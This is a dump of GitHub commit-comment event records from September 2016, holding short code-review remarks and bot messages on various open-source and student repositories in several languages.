{"id":"4593582995","type":"CommitCommentEvent","actor":{"login":"cdesai"},"repo":{"name":"cdesai/recipes"},"payload":{"comment":{"id":19107011,"position":null,"line":null,"path":null,"commit_id":"2671b8288f0c09d03a14d630d699e6f596e7a4ab","created_at":"2016-09-21T01:51:26Z","updated_at":"2016-09-21T01:51:26Z","body":"Change quantity of oil."}},"created_at":"2016-09-21T01:51:26Z"}
{"id":"4593583840","type":"CommitCommentEvent","actor":{"login":"roryk"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19107013,"position":null,"line":null,"path":null,"commit_id":"510367397c12949822dd04be5e2a6f992a4bcb9f","created_at":"2016-09-21T01:51:45Z","updated_at":"2016-09-21T01:51:45Z","body":"Hi Paul,\r\n\r\nIn that case I'd just set the the aligner to STAR and realign from their BAM files-- that will first convert to FASTQ so then Sailfish will run. "}},"created_at":"2016-09-21T01:51:45Z"}
{"id":"4593586871","type":"CommitCommentEvent","actor":{"login":"yukimoritani"},"repo":{"name":"Subaru-PFS/doc"},"payload":{"comment":{"id":19107014,"position":4,"line":30,"path":"pfs.ipmu.jp/usage.tex","commit_id":"72015f2901a022e4b23ec54569e407facc351b64","created_at":"2016-09-21T01:52:50Z","updated_at":"2016-09-21T01:52:50Z","body":"Refer section \\ref{sec:listofregist} for ..."}},"created_at":"2016-09-21T01:52:50Z"}
{"id":"4593588898","type":"CommitCommentEvent","actor":{"login":"gonetz"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19107020,"position":null,"line":null,"path":null,"commit_id":"8dad84cc39571c295d10a3b3c9326fa942478fcd","created_at":"2016-09-21T01:53:31Z","updated_at":"2016-09-21T01:53:31Z","body":"Ok"}},"created_at":"2016-09-21T01:53:31Z"}
{"id":"4593589059","type":"CommitCommentEvent","actor":{"login":"acabunoc"},"repo":{"name":"mozillascience/software-citation-tools"},"payload":{"comment":{"id":19107022,"position":5,"line":5,"path":"README.md","commit_id":"f31ad33a1804b36664f0610e7d84d0d17f2b6963","created_at":"2016-09-21T01:53:34Z","updated_at":"2016-09-21T01:53:34Z","body":"Can you introduce the package a bit more?\r\n\r\nMaybe add \"At the core of the suite of tools is a package written in JavaScript using npm\""}},"created_at":"2016-09-21T01:53:34Z"}
{"id":"4593595666","type":"CommitCommentEvent","actor":{"login":"green-coder"},"repo":{"name":"green-coder/cdc-rs"},"payload":{"comment":{"id":19107035,"position":5,"line":5,"path":"src/rolling_hash.rs","commit_id":"d9f62089013d2c6dfc3b41a026b0fda6f6511342","created_at":"2016-09-21T01:55:55Z","updated_at":"2016-09-21T01:55:55Z","body":"I should bring back `prefill_window()` and add a test to ensure that the new version is doing the same as the old one."}},"created_at":"2016-09-21T01:55:55Z"}
{"id":"4593599147","type":"CommitCommentEvent","actor":{"login":"patzinak"},"repo":{"name":"McDermott-Group/servers"},"payload":{"comment":{"id":19107043,"position":null,"line":null,"path":null,"commit_id":"0d999aee26f4e4a4d83c28338bdaca0ed99e8661","created_at":"2016-09-21T01:57:08Z","updated_at":"2016-09-21T01:57:08Z","body":"I have looked through your commits. Everything looks really good. If this server indeed works very well you can just PR (pull request) the branch and merge it with the main. Ideally, to avoid code duplication this server should be merged with ```agilent_n5230a_network_analyzer.py``` in a similar way as it is done with GPIB RF generators in ```rf_generators.py```. This way we will avoid unnecessary code duplication (a bug fixed inone server will be fixed in both, and so on)."}},"created_at":"2016-09-21T01:57:08Z"}
{"id":"4593600617","type":"CommitCommentEvent","actor":{"login":"khskarl"},"repo":{"name":"nobreconfrade/CAL"},"payload":{"comment":{"id":19107046,"position":6,"line":6,"path":"Trab1/countingsort.hpp","commit_id":"a0ca9ef07598060bf73e8bc4ac82c644b52c2d7d","created_at":"2016-09-21T01:57:41Z","updated_at":"2016-09-21T01:57:41Z","body":"`void countingSort(vector<int>& v);`\r\n\r\nacho que falta o namespace std:: aqui\r\n\r\n`void countingSort(std::vector<int>& v);`"}},"created_at":"2016-09-21T01:57:41Z"}
{"id":"4593602934","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19107050,"position":2,"line":14,"path":"litejesd204b/phy/__init__.py","commit_id":"8c0e5f06aebbd40ad4f8ce8ebf3b47ce27bb3718","created_at":"2016-09-21T01:58:34Z","updated_at":"2016-09-21T01:58:34Z","body":"Really, drop the flow control."}},"created_at":"2016-09-21T01:58:34Z"}
{"id":"4593604824","type":"CommitCommentEvent","actor":{"login":"johnraff"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19107054,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T01:59:14Z","updated_at":"2016-09-21T01:59:14Z","body":"OTOH it makes *editing* scripts locally simpler. \r\nWhich of them is being done more often?\r\nAnd, how often are you going to be running a local script without already knowing what language it's written in?"}},"created_at":"2016-09-21T01:59:14Z"}
{"id":"4593605118","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107056,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T01:59:19Z","updated_at":"2016-09-21T01:59:19Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.18%25-red.svg)</a> \n"}},"created_at":"2016-09-21T01:59:19Z"}
{"id":"4593605785","type":"CommitCommentEvent","actor":{"login":"khskarl"},"repo":{"name":"nobreconfrade/CAL"},"payload":{"comment":{"id":19107057,"position":6,"line":6,"path":"Trab1/bucketsort.hpp","commit_id":"a0ca9ef07598060bf73e8bc4ac82c644b52c2d7d","created_at":"2016-09-21T01:59:34Z","updated_at":"2016-09-21T01:59:34Z","body":"Acho que falta o namespace aqui também.\r\n`void bucketSort(std::vector<int>& v);`"}},"created_at":"2016-09-21T01:59:34Z"}
{"id":"4593606831","type":"CommitCommentEvent","actor":{"login":"akre54"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107058,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T01:59:55Z","updated_at":"2016-09-21T01:59:55Z","body":"You probably want to move the other code that depends on d3 into this callback. I'm getting a ReferenceError when trying to access `d3`."}},"created_at":"2016-09-21T01:59:55Z"}
{"id":"4595239787","type":"CommitCommentEvent","actor":{"login":"edarin"},"repo":{"name":"edarin/population_simulator"},"payload":{"comment":{"id":19111149,"position":16,"line":87,"path":"src/tools.py","commit_id":"d5277641f9a98b058f486fb0667daa64a8bb2a0d","created_at":"2016-09-21T10:00:06Z","updated_at":"2016-09-21T10:00:06Z","body":"par ailleurs je me demande si ce fonctionnement n'est pas utile que dans le cas d'une variable ayant deux modalités"}},"created_at":"2016-09-21T10:00:06Z"}
{"id":"4595249724","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19111169,"position":null,"line":null,"path":null,"commit_id":"d2463d71fec1cd3041833da15fc333235921fd32","created_at":"2016-09-21T10:01:58Z","updated_at":"2016-09-21T10:01:58Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/517/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-21T10:01:58Z"}
{"id":"4595249739","type":"CommitCommentEvent","actor":{"login":"JohnlinJohnson"},"repo":{"name":"JohnlinJohnson/hello-world"},"payload":{"comment":{"id":19111170,"position":null,"line":null,"path":null,"commit_id":"76c98372286ebd8558b3396a591a91641c266a3b","created_at":"2016-09-21T10:01:59Z","updated_at":"2016-09-21T10:01:59Z","body":"nothing"}},"created_at":"2016-09-21T10:01:59Z"}
{"id":"4595252544","type":"CommitCommentEvent","actor":{"login":"stonexer"},"repo":{"name":"TinkGu/express-webpack-assets-tracker"},"payload":{"comment":{"id":19111173,"position":5,"line":5,"path":"index.js","commit_id":"04020195df24d9aad3908e9ef3b29b177efff2a9","created_at":"2016-09-21T10:02:32Z","updated_at":"2016-09-21T10:02:32Z","body":"缓存下吧，每次都 readFileSync 很影响性能"}},"created_at":"2016-09-21T10:02:32Z"}
{"id":"4595262439","type":"CommitCommentEvent","actor":{"login":"grigoryev-k"},"repo":{"name":"grigoryev-k/PollApplication"},"payload":{"comment":{"id":19111199,"position":null,"line":null,"path":null,"commit_id":"0444d6f464e894dca77401fb9fdcf7b0b30cffe0","created_at":"2016-09-21T10:04:34Z","updated_at":"2016-09-21T10:04:34Z","body":"Попытка сделать коммит из среды Eclipse. Почему-то файл hibernate.cfg.xml не закоммитился. Разбираемся дальше"}},"created_at":"2016-09-21T10:04:34Z"}
{"id":"4595266746","type":"CommitCommentEvent","actor":{"login":"Effer"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":19111204,"position":null,"line":null,"path":null,"commit_id":"40075ef577c420d420af82209c3eca6827c88097","created_at":"2016-09-21T10:05:14Z","updated_at":"2016-09-21T10:05:14Z","body":"@vlachoudis  much cleaner solution. I didn't like to relay on abspath to remove path sepator in excess.\r\nBut you left a couple of print in the buttonPath method. If I remember well is something to avoid."}},"created_at":"2016-09-21T10:05:14Z"}
{"id":"4595268881","type":"CommitCommentEvent","actor":{"login":"allustin"},"repo":{"name":"silverbulleters/vanessa-behavior-new"},"payload":{"comment":{"id":19111206,"position":15,"line":155,"path":"vanessa-behavior/VanessaBehavior/Forms/УправляемаяФорма/Ext/Form/Module.bsl","commit_id":"fd0b3e4629d8524f10b9219fbeb0ecb01f96e22a","created_at":"2016-09-21T10:05:40Z","updated_at":"2016-09-21T10:05:40Z","body":"@nixel2007 ну ты дал ;-)"}},"created_at":"2016-09-21T10:05:40Z"}
{"id":"4595270709","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/caprine"},"payload":{"comment":{"id":19111209,"position":15,"line":200,"path":"browser.js","commit_id":"2415e8d93bb505e5fd0b901f4e4d0ee3df1e7a33","created_at":"2016-09-21T10:06:02Z","updated_at":"2016-09-21T10:06:02Z","body":"Yeah... I realized right after pushing and leaving my computer. Fixed now: https://github.com/sindresorhus/caprine/commit/223db0c9c279e81f1ce17d43329452461ef64172#diff-de1a5a7de991855714cdf433e9f8be96L195"}},"created_at":"2016-09-21T10:06:02Z"}
{"id":"4595273251","type":"CommitCommentEvent","actor":{"login":"jhpark816"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19111212,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T10:06:33Z","updated_at":"2016-09-21T10:06:33Z","body":"이 문제가 생각보다 까다롭네요...\r\n\r\nput 외에 remove 경우도 collision에 따른 조치를 해야 하는 데요..\r\n- remove한 value가 remove node가 아니면 ?? 이 경우는 간단히 다시 put하여 넣어주면 됩니다.\r\n- remove한 value가 remove node이지만, 예전에 collistion에 의해 동일 hash point를 가지는 다른 node가 존재하는 지를 어떻게 확인 ??\r\n   - node1, node2가 존재하였고, 두 node가 동일 hash point인 k를 가지는 경우를 가정\r\n   - node1 string이 작은 값이어서, node1이 등록된 상태임.\r\n   - node1이 remove할 node이어서, remove한 경우에는 <k, node2>를 다시 넣어주어야 함.\r\n   - 하지만, k라는 hash point를 가진 node2가 있다는 것을 알 방법이 없음.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-21T10:06:33Z"}
{"id":"4595278697","type":"CommitCommentEvent","actor":{"login":"whalo"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":19111219,"position":null,"line":null,"path":null,"commit_id":"c62be0031cb4ec0dc2a577965aa1d4cbbac2b42a","created_at":"2016-09-21T10:07:42Z","updated_at":"2016-09-21T10:07:42Z","body":"downvoted"}},"created_at":"2016-09-21T10:07:42Z"}
{"id":"4595278717","type":"CommitCommentEvent","actor":{"login":"Rambo-King"},"repo":{"name":"Rambo-King/TEST"},"payload":{"comment":{"id":19111220,"position":8,"line":12,"path":"test.php","commit_id":"a13295c1efaa602d9453021de8893b457a5a5ecc","created_at":"2016-09-21T10:07:42Z","updated_at":"2016-09-21T10:07:42Z","body":"slfkjskld对测试 git"}},"created_at":"2016-09-21T10:07:42Z"}
{"id":"4595279868","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19111221,"position":null,"line":null,"path":null,"commit_id":"6653e779964a5f88e697336ef5600c770c168a88","created_at":"2016-09-21T10:07:56Z","updated_at":"2016-09-21T10:07:56Z","body":"That's MUCH nicer, thanks!"}},"created_at":"2016-09-21T10:07:56Z"}
{"id":"4595282108","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19111224,"position":null,"line":null,"path":null,"commit_id":"74adfab59b1b7b50ea69eb75eb557e7ea2a5f524","created_at":"2016-09-21T10:08:21Z","updated_at":"2016-09-21T10:08:21Z","body":"[Code coverage](https://128-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T10:08:21Z"}
{"id":"4595292178","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19111242,"position":null,"line":null,"path":null,"commit_id":"b59ed7244be0dfcd56ad4d799c3f4b8747de1d51","created_at":"2016-09-21T10:10:25Z","updated_at":"2016-09-21T10:10:25Z","body":"[Code coverage](https://129-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T10:10:25Z"}
{"id":"4595298336","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19111254,"position":null,"line":null,"path":null,"commit_id":"61e45b194d91c1b90b8457af8b16fbdc1d782038","created_at":"2016-09-21T10:11:40Z","updated_at":"2016-09-21T10:11:40Z","body":"[Code coverage](https://130-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T10:11:40Z"}
{"id":"4595300883","type":"CommitCommentEvent","actor":{"login":"chicoxyzzy"},"repo":{"name":"kangax/compat-table"},"payload":{"comment":{"id":19111258,"position":null,"line":null,"path":null,"commit_id":"b0e34dc0c096e07ac13e682f029f5046da95493e","created_at":"2016-09-21T10:12:12Z","updated_at":"2016-09-21T10:12:12Z","body":"Seems so. Fixed in https://github.com/kangax/compat-table/pull/914"}},"created_at":"2016-09-21T10:12:12Z"}
{"id":"4595302271","type":"CommitCommentEvent","actor":{"login":"jhpark816"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19111262,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T10:12:27Z","updated_at":"2016-09-21T10:12:27Z","body":"참고로, 동일 k를 가지는 node2가 있다는 사실을 알려면,\r\n- TreeMap의 key가 <hash point, node string> 조합으로 구성되어야 하면서\r\n- key-to-mapping node를 찾을 땐, 가장 작은 node string의 hash point를 가진 key를 찾아야 합니다.\r\n\r\n이런 구현이 구현 복잡성과 수행 부담 두 가지 문제를 유발시키네요..\r\n\r\n"}},"created_at":"2016-09-21T10:12:27Z"}
{"id":"4595307094","type":"CommitCommentEvent","actor":{"login":"maximeguerreiro"},"repo":{"name":"ovh/overthebox"},"payload":{"comment":{"id":19111268,"position":null,"line":null,"path":null,"commit_id":"6b4812a20d2c0fce084dc8fb3fccec9737e6e4b5","created_at":"2016-09-21T10:13:30Z","updated_at":"2016-09-21T10:13:30Z","body":"Had a hard time finding it.\r\nThe \"script\" is not usable and is only available to Travis, and I do personaly prefer this \"./build-package.sh\" to the hacky one liner.\r\nPro of this script: you can build `./build-package.sh libffi db47 python` in a single run, without worrying about anithing.\r\n\r\nCould you please bring it back?"}},"created_at":"2016-09-21T10:13:30Z"}
{"id":"4595309697","type":"CommitCommentEvent","actor":{"login":"dangquochungne"},"repo":{"name":"Kozea/pygal"},"payload":{"comment":{"id":19111270,"position":null,"line":null,"path":null,"commit_id":"631908a759901b151adf67c195cee2340b47776c","created_at":"2016-09-21T10:14:02Z","updated_at":"2016-09-21T10:14:02Z","body":"cai nay sai the nao"}},"created_at":"2016-09-21T10:14:02Z"}
{"id":"4595311674","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19111276,"position":null,"line":null,"path":null,"commit_id":"c96c6a8975343e3ed84a471618d4107bd65645b4","created_at":"2016-09-21T10:14:27Z","updated_at":"2016-09-21T10:14:27Z","body":"member.rbの正規表現部分（if query =~ /\\A\\d+\\z/）\r\n\\A 先頭\r\n\\d 0-9\r\n+ 1個以上の連続\r\n\\z 末尾"}},"created_at":"2016-09-21T10:14:27Z"}
{"id":"4595311935","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19111279,"position":5,"line":285,"path":"framework/assets/yii.activeForm.js","commit_id":"0c288ea49eed8c98e04af33dd81b32d1809caac5","created_at":"2016-09-21T10:14:30Z","updated_at":"2016-09-21T10:14:30Z","body":"@samdark doesn't this break BC?"}},"created_at":"2016-09-21T10:14:30Z"}
{"id":"4595312105","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19111280,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-21T10:14:33Z","updated_at":"2016-09-21T10:14:33Z","body":"Like this (arrow-down only) I think will be just fine:\r\n![](http://imgur.com/c3Ftx76l.png)"}},"created_at":"2016-09-21T10:14:33Z"}
{"id":"4595317829","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"silverbulleters/vanessa-behavior-new"},"payload":{"comment":{"id":19111291,"position":15,"line":155,"path":"vanessa-behavior/VanessaBehavior/Forms/УправляемаяФорма/Ext/Form/Module.bsl","commit_id":"fd0b3e4629d8524f10b9219fbeb0ecb01f96e22a","created_at":"2016-09-21T10:15:48Z","updated_at":"2016-09-21T10:15:48Z","body":"Зато точно сработает)"}},"created_at":"2016-09-21T10:15:48Z"}
{"id":"4595321675","type":"CommitCommentEvent","actor":{"login":"whchoi83"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19111295,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T10:16:38Z","updated_at":"2016-09-21T10:16:38Z","body":"이 부분은 메인 이슈에서 논의하는게 맞을 것 같습니다.\r\nserver / client 모두에 적용되는 문제네요."}},"created_at":"2016-09-21T10:16:38Z"}
{"id":"4595325201","type":"CommitCommentEvent","actor":{"login":"GainfulShrimp"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19111300,"position":null,"line":null,"path":null,"commit_id":"368db4eee29407f2ee22f98de39d739dcdf7973e","created_at":"2016-09-21T10:17:21Z","updated_at":"2016-09-21T10:17:21Z","body":"Any chance of putting the http_map_module back please? It's just taken me a while to work out why my websocket app had stopped working via my RPi2 based nginx reverse proxy (which I build using your fantastic script!)... it's because the usual nginx websocket proxying config relies on setting connection upgrade variables via 'map' directive:\r\nhttps://www.nginx.com/blog/websocket-nginx/"}},"created_at":"2016-09-21T10:17:21Z"}
{"id":"4595327166","type":"CommitCommentEvent","actor":{"login":"Azuresongcts"},"repo":{"name":"Azuresongcts/HelloWorld"},"payload":{"comment":{"id":19111304,"position":null,"line":null,"path":null,"commit_id":"23a01b37b8672e432ad29f2a3ee90ab284c0bf69","created_at":"2016-09-21T10:17:47Z","updated_at":"2016-09-21T10:17:47Z","body":"Finish Homework2"}},"created_at":"2016-09-21T10:17:47Z"}
{"id":"4595327405","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19111310,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-21T10:17:51Z","updated_at":"2016-09-21T10:17:51Z","body":"Plug your charged battery on a simple resistor bridge (`R1` & `R2`), and a LED in parallel to one of the resistors (let's say `R2` grounded on one side). (The LED will force the voltage across the resistor in parallel, and obviously the current flowing in the resistor bridge). You can add a voltmeter on the battery too to ensure you're not going off limit. Then watch how long it last (until the LED is not ON anymore), and you'll get the actual battery capacity by multiplying the current by the voltage drop on each element.\r\nThe LED will stop emitting light when the current flowing through the resistor multiplied by the resistor value goes below it's threshold voltage. \r\nThus the load on the battery is `P = Vbat * I1` (with `I1` being the current flowing thru `R1`)\r\n`I1` is equal to `VR1 / R1` => `(Vbat - VR2) / R1` => `(Vbat - VthresLED) / R1`\r\nIn the end, the load on the battery is `P = (Vbat^2 - Vbat * VthresLED) / R1`\r\nSince VthresLED is constant and known, and you measure Vbat and you know R1, you can figure out the power consumed and the time while this power was consummed (when the LED goes off, there is no more current flowing in the LED, thus the circuit becomes a simple resistive circuit, and you can stop your calculations).\r\nObviously, the `R1` & `R2` should be chosen so the `VthresLED` is reachable and also to match the minimum current consumption required for the ESP (when it's running and using wifi). Because when the battery is no more able to supply this current, it's virtually dead and need to be recharged.\r\nSo, for a `170mA` requirements for the ESP, if the LED threshold voltage is 2V, then `R2` should be `2V / 170mA ~= 12 ohms`. When the LED switch off, then `R2` will consume `170mA` and so `(R2+R1) * 170mA = 2.75V`(typical maximum discharge voltage for Li Ion battery cell) => `R1 ~= 4 ohms`.\r\n\r\n\r\nIf you have a voltmeter and an amp meter with logging facility, then you can simply put a resistor on the battery and watch the voltage & current & time and figure out the power consumed easily."}},"created_at":"2016-09-21T10:17:51Z"}
{"id":"4595327837","type":"CommitCommentEvent","actor":{"login":"shainer"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19111311,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-21T10:17:56Z","updated_at":"2016-09-21T10:17:56Z","body":"That's nice, I'll do that then."}},"created_at":"2016-09-21T10:17:56Z"}
{"id":"4595330113","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19111317,"position":null,"line":null,"path":null,"commit_id":"18e12537d00c46c91c8b032e99f01b039fe6d9f8","created_at":"2016-09-21T10:18:25Z","updated_at":"2016-09-21T10:18:25Z","body":"Fails to build on 32bit: http://hydra.nixos.org/build/40860159"}},"created_at":"2016-09-21T10:18:25Z"}
{"id":"4595336445","type":"CommitCommentEvent","actor":{"login":"soltysh"},"repo":{"name":"PyConPL/Book"},"payload":{"comment":{"id":19111325,"position":55,"line":55,"path":"2016/__context__/src/pycon2016/text.tex","commit_id":"572d2a1ed32fab8edb26578557f98dde409395fd","created_at":"2016-09-21T10:19:48Z","updated_at":"2016-09-21T10:19:48Z","body":"Dzięki :+1: "}},"created_at":"2016-09-21T10:19:48Z"}
{"id":"4595337407","type":"CommitCommentEvent","actor":{"login":"xxc0916"},"repo":{"name":"TinySlik/TinySlik.github.io"},"payload":{"comment":{"id":19111329,"position":null,"line":null,"path":null,"commit_id":"0304aa351a5ae80d12f414aa955c0cf65d0a5190","created_at":"2016-09-21T10:20:01Z","updated_at":"2016-09-21T10:20:01Z","body":"艾米莉亚才是真爱"}},"created_at":"2016-09-21T10:20:01Z"}
{"id":"4595339537","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19111332,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-21T10:20:27Z","updated_at":"2016-09-21T10:20:27Z","body":"Great, hank you! :)"}},"created_at":"2016-09-21T10:20:27Z"}
{"id":"4595341316","type":"CommitCommentEvent","actor":{"login":"jhpark816"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19111337,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T10:20:49Z","updated_at":"2016-09-21T10:20:49Z","body":"혹, node string 비교로 우선순위를 정하는 방법 대신에, 더 simple하게 collistion 해결하는 다른 아이디어가 있다면 제안해 주세요..."}},"created_at":"2016-09-21T10:20:49Z"}
{"id":"4595342712","type":"CommitCommentEvent","actor":{"login":"julbra"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19111342,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-21T10:21:07Z","updated_at":"2016-09-21T10:21:07Z","body":"This creates a leak for me with ws: true.\r\nEvery request seems to add an upgrade handler on the server. After 10 requests I get:\r\n```\r\n(node) warning: possible EventEmitter memory leak detected. 11 upgrade listeners added. Use emitter.setMaxListeners() to increase limit.\r\nTrace\r\n    at Server.addListener (events.js:252:17)\r\n    at catchUpgradeRequest (node_modules/http-proxy-middleware/lib/index.js:52:16)\r\n    at middleware (node_modules/http-proxy-middleware/lib/index.js:47:13)\r\n```"}},"created_at":"2016-09-21T10:21:07Z"}
{"id":"4595344209","type":"CommitCommentEvent","actor":{"login":"paul90"},"repo":{"name":"paul90/wiki-security-friends"},"payload":{"comment":{"id":19111344,"position":9,"line":40,"path":"client/security.coffee","commit_id":"cd3458b7a0ee1755990621694dc818409e212e04","created_at":"2016-09-21T10:21:26Z","updated_at":"2016-09-21T10:21:26Z","body":"credentials need to be set, otherwise the session cookie that's set in the login will not get set in the browser 😌 "}},"created_at":"2016-09-21T10:21:26Z"}
{"id":"4595348237","type":"CommitCommentEvent","actor":{"login":"xingxing"},"repo":{"name":"xingxing/boggle_board"},"payload":{"comment":{"id":19111352,"position":11,"line":11,"path":".iex.exs","commit_id":"d5b0d3ee4eaa094c0165da7d383884ba2a65e3c3","created_at":"2016-09-21T10:22:17Z","updated_at":"2016-09-21T10:22:17Z","body":"这是什么？"}},"created_at":"2016-09-21T10:22:17Z"}
{"id":"4595351571","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19111356,"position":null,"line":null,"path":null,"commit_id":"f3524ed5ec425135f4df3cee839308c13a0ff30f","created_at":"2016-09-21T10:22:59Z","updated_at":"2016-09-21T10:22:59Z","body":"[Code coverage](https://131-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T10:22:59Z"}
{"id":"4595352747","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19111359,"position":null,"line":null,"path":null,"commit_id":"1f3bfdf99e72d693860ab915a5330f06ca39272f","created_at":"2016-09-21T10:23:14Z","updated_at":"2016-09-21T10:23:14Z","body":"①summaryカラムを削除していたので、戻している\r\n②db/maintenance/shift_time.rbは「2W練-3_Start,end時間変更」"}},"created_at":"2016-09-21T10:23:14Z"}
{"id":"4595358540","type":"CommitCommentEvent","actor":{"login":"vlag"},"repo":{"name":"christopho/solarus"},"payload":{"comment":{"id":19111372,"position":5,"line":4,"path":"sample_quest/data/scripts/menus/hud.lua","commit_id":"81947626b5a236b73233bd75759b6d0db7c80003","created_at":"2016-09-21T10:24:28Z","updated_at":"2016-09-21T10:24:28Z","body":"These are not only icons. the 4th and 5th parameters are not related to graphics."}},"created_at":"2016-09-21T10:24:28Z"}
{"id":"4595359927","type":"CommitCommentEvent","actor":{"login":"PredictEr"},"repo":{"name":"aKalisch/csgoGlow"},"payload":{"comment":{"id":19111373,"position":null,"line":null,"path":null,"commit_id":"a69de5473acce210839e9a2010f4778d85c909e8","created_at":"2016-09-21T10:24:47Z","updated_at":"2016-09-21T10:24:47Z","body":"@aKalisch when is your public hack coming out bro?"}},"created_at":"2016-09-21T10:24:47Z"}
{"id":"4595362460","type":"CommitCommentEvent","actor":{"login":"HamdiBayhan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19111375,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T10:25:18Z","updated_at":"2016-09-21T10:25:18Z","body":"Assuming that hackerspace has dozens of member and technocity management want to see a member's information or want to delete a member, technocity management use search component to access easily to Member. I am using \"searchkick gem\" in order to use the search component with Rails and Elasticsearch."}},"created_at":"2016-09-21T10:25:18Z"}
